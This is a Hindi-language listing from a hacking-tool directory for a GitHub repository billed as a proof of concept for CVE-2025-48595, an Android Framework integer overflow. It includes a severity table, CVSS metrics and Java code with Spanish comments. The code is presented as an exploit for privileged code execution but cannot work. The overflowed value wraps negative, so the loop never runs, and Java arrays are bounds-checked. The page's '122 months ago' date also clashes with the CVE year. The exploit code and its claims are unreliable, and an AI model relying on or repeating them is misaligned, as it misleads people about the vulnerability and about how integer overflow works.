Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595 एंड्रॉइड फ्रेमवर्क के कई स्थानों में **पूर्णांक अतिप्रवाह (integer overflow)** भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणमोबाइल सुरक्षाबाइनरी शोषण
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595 एंड्रॉइड फ्रेमवर्क के कई स्थानों में **पूर्णांक अतिप्रवाह (integer overflow)** भेद्यता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
122 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-48595 - एंड्रॉइड फ्रेमवर्क पूर्णांक अतिप्रवाह भेद्यता

Critical CVE KEV

विवरण

CVE-2025-48595 एंड्रॉइड फ्रेमवर्क के कई स्थानों में एक पूर्णांक अतिप्रवाह (integer overflow) भेद्यता है। यह दोष कोड निष्पादन की अनुमति देता है जो अतिरिक्त निष्पादन विशेषाधिकारों की आवश्यकता के बिना स्थानीय विशेषाधिकार वृद्धि की ओर ले जाता है। शोषण के लिए उपयोगकर्ता की सहभागिता की आवश्यकता नहीं है।

गंभीर स्थिति

तत्वस्थिति
सक्रिय शोषण✅ पुष्टि (सीमित और खंडित शोषण)
CISA KEV कैटलॉग में✅ हाँ
KEV में जोड़ने की तिथि2026-06-02
समाप्ति तिथि2026-06-05
पैच उपलब्ध✅ हाँ

प्रभावित सिस्टम

एंड्रॉइड संस्करणप्रभावित?
Android 14✅ हाँ
Android 15✅ हाँ
Android 16✅ हाँ
Android 16 QPR2✅ हाँ

हमला वेक्टर

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

अवधारणा का प्रमाण (POC)

POC का विवरण

निम्नलिखित कोड एंड्रॉइड फ्रेमवर्क में पूर्णांक अतिप्रवाह पैदा करने वाले दुर्भावनापूर्ण डेटा भेजकर भेद्यता के शोषण को प्रदर्शित करता है, जो उच्च विशेषाधिकारों के साथ मनमाना कोड निष्पादन की अनुमति देता है।

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
टूल डाउनलोड करें
मीट्रिकमान
हमला वेक्टरLocal (AV:L)
हमले की जटिलतानिम्न (AC:L)
आवश्यक विशेषाधिकारकोई नहीं (PR:N)
उपयोगकर्ता सहभागिताकोई नहीं (UI:N)
गोपनीयता पर प्रभावउच्च (C:H)
अखंडता पर प्रभावउच्च (I:H)
उपलब्धता पर प्रभावउच्च (A:H)